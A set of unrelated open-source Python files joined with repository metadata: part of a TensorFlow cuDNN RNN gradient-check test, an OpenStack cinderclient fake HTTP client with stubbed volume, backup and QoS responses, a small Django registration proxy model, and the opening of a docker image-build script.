x_neg = x_data.copy()
if x_size == 1:
x_neg -= delta
else:
x_neg.flat[i] -= delta
y_neg_feed_dict = dict([(x.name, x_neg)])
y_neg = sess.run(y, feed_dict=y_neg_feed_dict)
numeric_grad[i] = (y_pos - y_neg) / (2 * delta)
return numeric_grad.reshape(x_shape)
def _GetShape(self, sess, inputs):
if not isinstance(inputs, collections.Iterable):
return sess.run(array_ops.shape(inputs))
else:
return sess.run([array_ops.shape(x) for x in inputs])
def _GradientCheckFp16(self, sess, y, xs, num_samples,
tolerance=1e-6, delta=1e-4):
"""Gradient check for Fp16.
Fp16 numerical gradients end up being zeros. Use a new way to check
gradients:
Given multi-variant function:
y = f(x1, x2, ... xn)
delta_y = f(x1 + delta_x1, x2+delta_x2, ..., xn+delta_xn) -
f(x1, x2, ..., xn)
= f'(x1) * delta_x1 + f'(x2) * delta_x2 + .. + f'(xn) * delta_xn
where:
delta_xi are very small disturbance.
f'(xi) is the gradient of y w.r.t xi.
The gradient check verifies the expected delta_y calculated by the above
equation is close to the actual delta_y.
Args:
sess: tf.Session object.
y: output tensor.
xs: a tensor or a list of input tensors.
num_samples: number of test samples to run.
tolerance: error tolerance.
delta: the order of magnititued of input disturbance to apply to calculate
the output change w.r.t inputs.
"""
sym_grads = self._ComputeSymGrads(sess, y, xs)
xs_shapes = self._GetShape(sess, xs)
x_vals = [sess.run(x) for x in xs]
for _ in range(num_samples):
delta_xs = [delta * np.random.rand(*shape.tolist())
for shape in xs_shapes]
feed_dict = {}
for x, x_val, delta_x in zip(xs, x_vals, delta_xs):
feed_dict[x] = x_val + delta_x
actual_delta_y = (float(sess.run(y, feed_dict=feed_dict)) -
float(sess.run(y)))
expected_delta_y = 0.
for sym_grad, delta_x in zip(sym_grads, delta_xs):
expected_delta_y += np.dot(
sym_grad.astype(np.float32).flatten(),
delta_x.astype(np.float32).flatten())
self.assertAllClose(expected_delta_y, actual_delta_y,
atol=tolerance, rtol=tolerance)
def _GradientCheck(self, sess, y, xs, tolerance=1e-6, delta=1e-4):
sym_grads = self._ComputeSymGrads(sess, y, xs)
num_grads = [self._ComputeNumericGrad(sess, y, x, delta) for x in xs]
self.assertEqual(len(sym_grads), len(num_grads))
for sym, num in zip(sym_grads, num_grads):
self.assertFalse(np.any(np.isnan(sym)))
self.assertFalse(np.any(np.isnan(num)))
self.assertAllClose(sym, num, atol=tolerance, rtol=tolerance)
def _ComputeSymGrads(self, sess, y, xs):
sym_grads_t = gradients.gradients(y, xs)
return sess.run(sym_grads_t)
def _TestOneSimpleTraining(self, rnn_mode, num_layers, num_units, input_size,
batch_size, seq_length, dir_count, dropout, dtype,
use_v2, delta, tolerance):
# Gradient checking runs two forward ops with almost the same input. Need to
# make sure the drop patterns across the two runs are the same.
logging.info("Training test with config: %s", locals())
os.environ["TF_CUDNN_RESET_RND_GEN_STATE"] = str(True)
np.random.seed(1234)
random_seed.set_random_seed(5678)
has_input_c = (rnn_mode == CUDNN_LSTM)
direction = (CUDNN_RNN_UNIDIRECTION
if dir_count == 1 else CUDNN_RNN_BIDIRECTION)
if use_v2:
os.environ["TF_CUDNN_RNN_USE_V2"] = "1"
else:
os.environ["TF_CUDNN_RNN_USE_V2"] = "0"
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dropout=dropout,
dtype=dtype,
training=True,
bias_initializer=init_ops.random_normal_initializer(
mean=1., dtype=dtype))
rnn = model.rnn
params = rnn.trainable_variables[0]
inputs = variables.Variable(
random_ops.random_uniform(
[seq_length, batch_size, input_size], dtype=dtype),
dtype=dtype)
input_h = variables.Variable(
random_ops.random_uniform(
[num_layers * dir_count, batch_size, num_units], dtype=dtype),
dtype=dtype)
if has_input_c:
input_c = variables.Variable(
random_ops.random_uniform(
[num_layers * dir_count, batch_size, num_units], dtype=dtype),
dtype=dtype)
initial_state = (input_h, input_c)
else:
initial_state = (input_h,)
total_sum = model.FProp(inputs, initial_state, training=True)
with self.test_session(use_gpu=True, graph=ops.get_default_graph()) as sess:
sess.run(variables.global_variables_initializer())
all_inputs = [inputs, params]
for s in initial_state:
all_inputs.append(s)
if dtype == dtypes.float16:
self._GradientCheckFp16(
sess, total_sum, all_inputs,
num_samples=FLAGS.grad_check_num_samples,
tolerance=tolerance, delta=delta)
else:
for _ in range(FLAGS.grad_check_num_samples):
# Each time choose a different set of inputs.
sess.run(variables.global_variables_initializer())
self._GradientCheck(
sess, total_sum, all_inputs,
tolerance=tolerance, delta=delta)
def _TestSimpleTrainingHelper(self, rnn_mode, test_configs):
dropouts = [0, 0.5, 1.]
v2_options = [str(False), str(True)]
for config, dropout, use_v2 in itertools.product(test_configs, dropouts,
v2_options):
dtype = config.get("dtype", dtypes.float32)
delta = config.get("delta", 1e-4)
tolerance = config.get("tolerance", 1e-6)
dir_count = config.get("dir_count", 1)
shape = config["shape"]
with ops.Graph().as_default():
self._TestOneSimpleTraining(
rnn_mode, shape["num_layers"], shape["num_units"],
shape["input_size"], shape["batch_size"], shape["seq_length"],
dir_count, dropout, dtype, use_v2, delta, tolerance)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingLSTMFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_LSTM, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingLSTMFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-4,
"tolerance": 9e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_LSTM, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingLSTMFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 1e-3,
"tolerance": 9e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
{
"dtype": dtypes.float16,
"delta": 1e-2,
"tolerance": 9e-2,
"shape": {
"num_layers": 2,
"num_units": 6,
"input_size": 8,
"batch_size": 6,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_LSTM, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingGRUFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
}
},
]
self._TestSimpleTrainingHelper(CUDNN_GRU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingGRUFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-3,
"tolerance": 4e-3,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_GRU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingGRUFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 2e-3,
"tolerance": 6e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_GRU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNTanhFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_TANH, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNTanhFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-3,
"tolerance": 5e-3,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_TANH, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNTanhFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 1e-3,
"tolerance": 5e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_TANH, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNReluFp64(self):
test_configs = [
{
"dtype": dtypes.float64,
"tolerance": 5e-6,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_RELU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNReluFp32(self):
test_configs = [
{
"dtype": dtypes.float32,
"delta": 1e-4,
"tolerance": 3e-1,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_RELU, test_configs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSimpleTrainingRNNReluFp16(self):
test_configs = [
{
"dtype": dtypes.float16,
"delta": 1e-3,
"tolerance": 7e-2,
"shape": {
"num_layers": 2,
"num_units": 3,
"input_size": 4,
"batch_size": 3,
"seq_length": 4,
},
},
]
self._TestSimpleTrainingHelper(CUDNN_RNN_RELU, test_configs)
if __name__ == "__main__":
argv0 = sys.argv[0]
parser = argparse.ArgumentParser()
parser.add_argument(
"--grad_check_num_samples",
type=int,
default=5,
help="Number of samples to run for gradient check.")
FLAGS, unparsed = parser.parse_known_args()
sys.argv = [argv0] + unparsed
googletest.main()
|
yanchen036/tensorflow
|
tensorflow/contrib/cudnn_rnn/python/kernel_tests/cudnn_rnn_test.py
|
Python
|
apache-2.0
| 57,239 | 0.006918 |
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
from cinderclient import client as base_client
from cinderclient.tests import fakes
import cinderclient.tests.utils as utils
from cinderclient.v2 import client
def _stub_volume(**kwargs):
volume = {
'id': '1234',
'name': None,
'description': None,
"attachments": [],
"bootable": "false",
"availability_zone": "cinder",
"created_at": "2012-08-27T00:00:00.000000",
"id": '00000000-0000-0000-0000-000000000000',
"metadata": {},
"size": 1,
"snapshot_id": None,
"status": "available",
"volume_type": "None",
"links": [
{
"href": "http://localhost/v2/fake/volumes/1234",
"rel": "self"
},
{
"href": "http://localhost/fake/volumes/1234",
"rel": "bookmark"
}
],
}
volume.update(kwargs)
return volume
def _stub_snapshot(**kwargs):
snapshot = {
"created_at": "2012-08-28T16:30:31.000000",
"display_description": None,
"display_name": None,
"id": '11111111-1111-1111-1111-111111111111',
"size": 1,
"status": "available",
"volume_id": '00000000-0000-0000-0000-000000000000',
}
snapshot.update(kwargs)
return snapshot
def _self_href(base_uri, tenant_id, backup_id):
return '%s/v2/%s/backups/%s' % (base_uri, tenant_id, backup_id)
def _bookmark_href(base_uri, tenant_id, backup_id):
return '%s/%s/backups/%s' % (base_uri, tenant_id, backup_id)
def _stub_backup_full(id, base_uri, tenant_id):
return {
'id': id,
'name': 'backup',
'description': 'nightly backup',
'volume_id': '712f4980-5ac1-41e5-9383-390aa7c9f58b',
'container': 'volumebackups',
'object_count': 220,
'size': 10,
'availability_zone': 'az1',
'created_at': '2013-04-12T08:16:37.000000',
'status': 'available',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_backup(id, base_uri, tenant_id):
return {
'id': id,
'name': 'backup',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_qos_full(id, base_uri, tenant_id, name=None, specs=None):
if not name:
name = 'fake-name'
if not specs:
specs = {}
return {
'qos_specs': {
'id': id,
'name': name,
'consumer': 'back-end',
'specs': specs,
},
'links': {
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
}
def _stub_qos_associates(id, name):
return {
'assoications_type': 'volume_type',
'name': name,
'id': id,
}
def _stub_restore():
return {'volume_id': '712f4980-5ac1-41e5-9383-390aa7c9f58b'}
def _stub_transfer_full(id, base_uri, tenant_id):
return {
'id': id,
'name': 'transfer',
'volume_id': '8c05f861-6052-4df6-b3e0-0aebfbe686cc',
'created_at': '2013-04-12T08:16:37.000000',
'auth_key': '123456',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_transfer(id, base_uri, tenant_id):
return {
'id': id,
'name': 'transfer',
'volume_id': '8c05f861-6052-4df6-b3e0-0aebfbe686cc',
'links': [
{
'href': _self_href(base_uri, tenant_id, id),
'rel': 'self'
},
{
'href': _bookmark_href(base_uri, tenant_id, id),
'rel': 'bookmark'
}
]
}
def _stub_extend(id, new_size):
return {'volume_id': '712f4980-5ac1-41e5-9383-390aa7c9f58b'}
class FakeClient(fakes.FakeClient, client.Client):
def __init__(self, *args, **kwargs):
client.Client.__init__(self, 'username', 'password',
'project_id', 'auth_url',
extensions=kwargs.get('extensions'))
self.client = FakeHTTPClient(**kwargs)
def get_volume_api_version_from_endpoint(self):
return self.client.get_volume_api_version_from_endpoint()
class FakeHTTPClient(base_client.HTTPClient):
def __init__(self, **kwargs):
self.username = 'username'
self.password = 'password'
self.auth_url = 'auth_url'
self.callstack = []
self.management_url = 'http://10.0.2.15:8776/v2/fake'
def _cs_request(self, url, method, **kwargs):
# Check that certain things are called correctly
if method in ['GET', 'DELETE']:
assert 'body' not in kwargs
elif method == 'PUT':
assert 'body' in kwargs
# Call the method
args = urlparse.parse_qsl(urlparse.urlparse(url)[4])
kwargs.update(args)
munged_url = url.rsplit('?', 1)[0]
munged_url = munged_url.strip('/').replace('/', '_').replace('.', '_')
munged_url = munged_url.replace('-', '_')
callback = "%s_%s" % (method.lower(), munged_url)
if not hasattr(self, callback):
raise AssertionError('Called unknown API method: %s %s, '
'expected fakes method name: %s' %
(method, url, callback))
# Note the call
self.callstack.append((method, url, kwargs.get('body', None)))
status, headers, body = getattr(self, callback)(**kwargs)
r = utils.TestResponse({
"status_code": status,
"text": body,
"headers": headers,
})
return r, body
if hasattr(status, 'items'):
return utils.TestResponse(status), body
else:
return utils.TestResponse({"status": status}), body
def get_volume_api_version_from_endpoint(self):
magic_tuple = urlparse.urlsplit(self.management_url)
scheme, netloc, path, query, frag = magic_tuple
return path.lstrip('/').split('/')[0][1:]
#
# Snapshots
#
def get_snapshots_detail(self, **kw):
return (200, {}, {'snapshots': [
_stub_snapshot(),
]})
def get_snapshots_1234(self, **kw):
return (200, {}, {'snapshot': _stub_snapshot(id='1234')})
def put_snapshots_1234(self, **kw):
snapshot = _stub_snapshot(id='1234')
snapshot.update(kw['body']['snapshot'])
return (200, {}, {'snapshot': snapshot})
def post_snapshots_1234_action(self, body, **kw):
_body = None
resp = 202
assert len(body.keys()) == 1
action = body.keys()[0]
if action == 'os-reset_status':
assert 'status' in body['os-reset_status']
elif action == 'os-update_snapshot_status':
assert 'status' in body['os-update_snapshot_status']
else:
raise AssertionError('Unexpected action: %s' % action)
return (resp, {}, _body)
#
# Volumes
#
def put_volumes_1234(self, **kw):
volume = _stub_volume(id='1234')
volume.update(kw['body']['volume'])
return (200, {}, {'volume': volume})
def get_volumes(self, **kw):
return (200, {}, {"volumes": [
{'id': 1234, 'name': 'sample-volume'},
{'id': 5678, 'name': 'sample-volume2'}
]})
# TODO(jdg): This will need to change
# at the very least it's not complete
def get_volumes_detail(self, **kw):
return (200, {}, {"volumes": [
{'id': 1234,
'name': 'sample-volume',
'attachments': [{'server_id': 1234}]},
]})
def get_volumes_1234(self, **kw):
r = {'volume': self.get_volumes_detail()[2]['volumes'][0]}
return (200, {}, r)
def get_volumes_1234_encryption(self, **kw):
r = {'encryption_key_id': 'id'}
return (200, {}, r)
def post_volumes_1234_action(self, body, **kw):
_body = None
resp = 202
assert len(list(body.keys())) == 1
action = list(body.keys())[0]
if action == 'os-attach':
assert list(body[action].keys()) == ['instance_uuid', 'mountpoint']
elif action == 'os-detach':
assert body[action] is None
elif action == 'os-reserve':
assert body[action] is None
elif action == 'os-unreserve':
assert body[action] is None
elif action == 'os-initialize_connection':
assert list(body[action].keys()) == ['connector']
return (202, {}, {'connection_info': 'foos'})
elif action == 'os-terminate_connection':
assert list(body[action].keys()) == ['connector']
elif action == 'os-begin_detaching':
assert body[action] is None
elif action == 'os-roll_detaching':
assert body[action] is None
elif action == 'os-reset_status':
assert 'status' in body[action]
elif action == 'os-extend':
assert body[action].keys() == ['new_size']
elif action == 'os-migrate_volume':
assert 'host' in body[action]
assert 'force_host_copy' in body[action]
else:
raise AssertionError("Unexpected action: %s" % action)
return (resp, {}, _body)
def post_volumes(self, **kw):
return (202, {}, {'volume': {}})
def delete_volumes_1234(self, **kw):
return (202, {}, None)
#
# Quotas
#
def get_os_quota_sets_test(self, **kw):
return (200, {}, {'quota_set': {
'tenant_id': 'test',
'metadata_items': [],
'volumes': 1,
'snapshots': 1,
'gigabytes': 1}})
def get_os_quota_sets_test_defaults(self):
return (200, {}, {'quota_set': {
'tenant_id': 'test',
'metadata_items': [],
'volumes': 1,
'snapshots': 1,
'gigabytes': 1}})
def put_os_quota_sets_test(self, body, **kw):
assert list(body.keys()) == ['quota_set']
fakes.assert_has_keys(body['quota_set'],
required=['tenant_id'])
return (200, {}, {'quota_set': {
'tenant_id': 'test',
'metadata_items': [],
'volumes': 2,
'snapshots': 2,
'gigabytes': 1}})
#
# Quota Classes
#
def get_os_quota_class_sets_test(self, **kw):
return (200, {}, {'quota_class_set': {
'class_name': 'test',
'metadata_items': [],
'volumes': 1,
'snapshots': 1,
'gigabytes': 1}})
def put_os_quota_class_sets_test(self, body, **kw):
assert list(body.keys()) == ['quota_class_set']
fakes.assert_has_keys(body['quota_class_set'],
required=['class_name'])
return (200, {}, {'quota_class_set': {
'class_name': 'test',
'metadata_items': [],
'volumes': 2,
'snapshots': 2,
'gigabytes': 1}})
#
# VolumeTypes
#
def get_types(self, **kw):
return (200, {}, {
'volume_types': [{'id': 1,
'name': 'test-type-1',
'extra_specs': {}},
{'id': 2,
'name': 'test-type-2',
'extra_specs': {}}]})
def get_types_1(self, **kw):
return (200, {}, {'volume_type': {'id': 1,
'name': 'test-type-1',
'extra_specs': {}}})
def get_types_2(self, **kw):
return (200, {}, {'volume_type': {'id': 2,
'name': 'test-type-2',
'extra_specs': {}}})
def post_types(self, body, **kw):
return (202, {}, {'volume_type': {'id': 3,
'name': 'test-type-3',
'extra_specs': {}}})
def post_types_1_extra_specs(self, body, **kw):
assert list(body.keys()) == ['extra_specs']
return (200, {}, {'extra_specs': {'k': 'v'}})
def delete_types_1_extra_specs_k(self, **kw):
return(204, {}, None)
def delete_types_1(self, **kw):
return (202, {}, None)
#
# VolumeEncryptionTypes
#
def get_types_1_encryption(self, **kw):
return (200, {}, {'id': 1, 'volume_type_id': 1, 'provider': 'test',
'cipher': 'test', 'key_size': 1,
'control_location': 'front'})
def get_types_2_encryption(self, **kw):
return (200, {}, {})
def post_types_2_encryption(self, body, **kw):
return (200, {}, {'encryption': {}})
def put_types_1_encryption_1(self, body, **kw):
return (200, {}, {})
#
# Set/Unset metadata
#
def delete_volumes_1234_metadata_test_key(self, **kw):
return (204, {}, None)
def delete_volumes_1234_metadata_key1(self, **kw):
return (204, {}, None)
def delete_volumes_1234_metadata_key2(self, **kw):
return (204, {}, None)
def post_volumes_1234_metadata(self, **kw):
return (204, {}, {'metadata': {'test_key': 'test_value'}})
#
# List all extensions
#
def get_extensions(self, **kw):
exts = [
{
"alias": "FAKE-1",
"description": "Fake extension number 1",
"links": [],
"name": "Fake1",
"namespace": ("http://docs.openstack.org/"
"/ext/fake1/api/v1.1"),
"updated": "2011-06-09T00:00:00+00:00"
},
{
"alias": "FAKE-2",
"description": "Fake extension number 2",
"links": [],
"name": "Fake2",
"namespace": ("http://docs.openstack.org/"
"/ext/fake1/api/v1.1"),
"updated": "2011-06-09T00:00:00+00:00"
},
]
return (200, {}, {"extensions": exts, })
#
# VolumeBackups
#
def get_backups_76a17945_3c6f_435c_975b_b5685db10b62(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
backup1 = '76a17945-3c6f-435c-975b-b5685db10b62'
return (200, {},
{'backup': _stub_backup_full(backup1, base_uri, tenant_id)})
def get_backups_detail(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
backup1 = '76a17945-3c6f-435c-975b-b5685db10b62'
backup2 = 'd09534c6-08b8-4441-9e87-8976f3a8f699'
return (200, {},
{'backups': [
_stub_backup_full(backup1, base_uri, tenant_id),
_stub_backup_full(backup2, base_uri, tenant_id)]})
def delete_backups_76a17945_3c6f_435c_975b_b5685db10b62(self, **kw):
return (202, {}, None)
def post_backups(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
backup1 = '76a17945-3c6f-435c-975b-b5685db10b62'
return (202, {},
{'backup': _stub_backup(backup1, base_uri, tenant_id)})
def post_backups_76a17945_3c6f_435c_975b_b5685db10b62_restore(self, **kw):
return (200, {},
{'restore': _stub_restore()})
#
# QoSSpecs
#
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
qos_id1 = '1B6B6A04-A927-4AEB-810B-B7BAAD49F57C'
return (200, {},
_stub_qos_full(qos_id1, base_uri, tenant_id))
def get_qos_specs(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
qos_id1 = '1B6B6A04-A927-4AEB-810B-B7BAAD49F57C'
qos_id2 = '0FD8DD14-A396-4E55-9573-1FE59042E95B'
return (200, {},
{'qos_specs': [
_stub_qos_full(qos_id1, base_uri, tenant_id, 'name-1'),
_stub_qos_full(qos_id2, base_uri, tenant_id)]})
def post_qos_specs(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
qos_id = '1B6B6A04-A927-4AEB-810B-B7BAAD49F57C'
qos_name = 'qos-name'
return (202, {},
_stub_qos_full(qos_id, base_uri, tenant_id, qos_name))
def put_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C(self, **kw):
return (202, {}, None)
def put_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_delete_keys(
self, **kw):
return (202, {}, None)
def delete_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C(self, **kw):
return (202, {}, None)
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_associations(
self, **kw):
type_id1 = '4230B13A-7A37-4E84-B777-EFBA6FCEE4FF'
type_id2 = '4230B13A-AB37-4E84-B777-EFBA6FCEE4FF'
type_name1 = 'type1'
type_name2 = 'type2'
return (202, {},
{'qos_associations': [
_stub_qos_associates(type_id1, type_name1),
_stub_qos_associates(type_id2, type_name2)]})
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_associate(
self, **kw):
return (202, {}, None)
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_disassociate(
self, **kw):
return (202, {}, None)
def get_qos_specs_1B6B6A04_A927_4AEB_810B_B7BAAD49F57C_disassociate_all(
self, **kw):
return (202, {}, None)
#
#
# VolumeTransfers
#
def get_os_volume_transfer_5678(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
return (200, {},
{'transfer':
_stub_transfer_full(transfer1, base_uri, tenant_id)})
def get_os_volume_transfer_detail(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
transfer2 = 'f625ec3e-13dd-4498-a22a-50afd534cc41'
return (200, {},
{'transfers': [
_stub_transfer_full(transfer1, base_uri, tenant_id),
_stub_transfer_full(transfer2, base_uri, tenant_id)]})
def delete_os_volume_transfer_5678(self, **kw):
return (202, {}, None)
def post_os_volume_transfer(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
return (202, {},
{'transfer': _stub_transfer(transfer1, base_uri, tenant_id)})
def post_os_volume_transfer_5678_accept(self, **kw):
base_uri = 'http://localhost:8776'
tenant_id = '0fa851f6668144cf9cd8c8419c1646c1'
transfer1 = '5678'
return (200, {},
{'transfer': _stub_transfer(transfer1, base_uri, tenant_id)})
#
# Services
#
def get_os_services(self, **kw):
host = kw.get('host', None)
binary = kw.get('binary', None)
services = [
{
'binary': 'cinder-volume',
'host': 'host1',
'zone': 'cinder',
'status': 'enabled',
'state': 'up',
'updated_at': datetime(2012, 10, 29, 13, 42, 2)
},
{
'binary': 'cinder-volume',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38)
},
{
'binary': 'cinder-scheduler',
'host': 'host2',
'zone': 'cinder',
'status': 'disabled',
'state': 'down',
'updated_at': datetime(2012, 9, 18, 8, 3, 38)
},
]
if host:
services = filter(lambda i: i['host'] == host, services)
if binary:
services = filter(lambda i: i['binary'] == binary, services)
return (200, {}, {'services': services})
def put_os_services_enable(self, body, **kw):
return (200, {}, {'host': body['host'], 'binary': body['binary'],
'status': 'disabled'})
def put_os_services_disable(self, body, **kw):
return (200, {}, {'host': body['host'], 'binary': body['binary'],
'status': 'enabled'})
def get_os_availability_zone(self, **kw):
return (200, {}, {
"availabilityZoneInfo": [
{
"zoneName": "zone-1",
"zoneState": {"available": True},
"hosts": None,
},
{
"zoneName": "zone-2",
"zoneState": {"available": False},
"hosts": None,
},
]
})
def get_os_availability_zone_detail(self, **kw):
return (200, {}, {
"availabilityZoneInfo": [
{
"zoneName": "zone-1",
"zoneState": {"available": True},
"hosts": {
"fake_host-1": {
"cinder-volume": {
"active": True,
"available": True,
"updated_at":
datetime(2012, 12, 26, 14, 45, 25, 0)
}
}
}
},
{
"zoneName": "internal",
"zoneState": {"available": True},
"hosts": {
"fake_host-1": {
"cinder-sched": {
"active": True,
"available": True,
"updated_at":
datetime(2012, 12, 26, 14, 45, 24, 0)
}
}
}
},
{
"zoneName": "zone-2",
"zoneState": {"available": False},
"hosts": None,
},
]
})
|
citrix-openstack-build/python-cinderclient
|
cinderclient/tests/v2/fakes.py
|
Python
|
apache-2.0
| 24,282 | 0.000124 |
from registrator.models.registration_entry import RegistrationEntry
from uni_info.models import Section
class RegistrationProxy(RegistrationEntry):
"""
Proxy class which handles actually doing the registration in a system
of a :model:`registrator.RegistrationEntry`
"""
# I guess functions for registration in Concordia's system would go here?
def add_schedule_item(self, schedule_item):
section_list = schedule_item.sections
sections = {}
sections['MainSec'] = section_list[0]
for i in range(1, len(section_list)):
sections['RelSec' + str(i)] = section_list[i]
sections['course_letters'] = section_list[0].course.course_letters
sections['course_numbers'] = section_list[0].course.course_numbers
sections['session'] = section_list[0].semester_year
sections['CatNum'] = '12345'
sections['Start'] = section_list[0].start_time
sections['Finish'] = section_list[0].end_time
sections['Campus'] = 'S'
sections['Title'] = section_list[0].course.name
return sections
class Meta:
proxy = True
|
squarebracket/star
|
registrator/models/registration_proxy.py
|
Python
|
gpl-2.0
| 1,141 | 0.001753 |
import argparse
import docker
import logging
import os
import docket
logger = logging.getLogger('docket')
logging.basicConfig()
parser = argparse.ArgumentParser(description='')
parser.add_argument('-t --tag', dest='tag', help='tag for final image')
parser.add_argument('--verbose', dest='verbose', action='store_true', help='verbose output', default=False)
parser.add_argument('--no-cache', dest='no_cache', action='store_true', help='Do not use cache when building the image', default=False)
parser.add_argument('buildpath', nargs='*')
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
cert_path = os.environ.get('DOCKER_CERT_PATH', '')
tls_verify = os.environ.get('DOCKER_TLS_VERIFY', '0')
base_url = os.environ.get('DOCKER_HOST', 'tcp://127.0.0.1:2375')
base_url = base_url.replace('tcp:', 'https:')
tls_config = None
if cert_path:
tls_config = docker.tls.TLSConfig(verify=tls_verify,
client_cert=(os.path.join(cert_path, 'cert.pem'), os.path.join(cert_path, 'key.pem')),
ca_cert=os.path.join(cert_path, 'ca.pem')
)
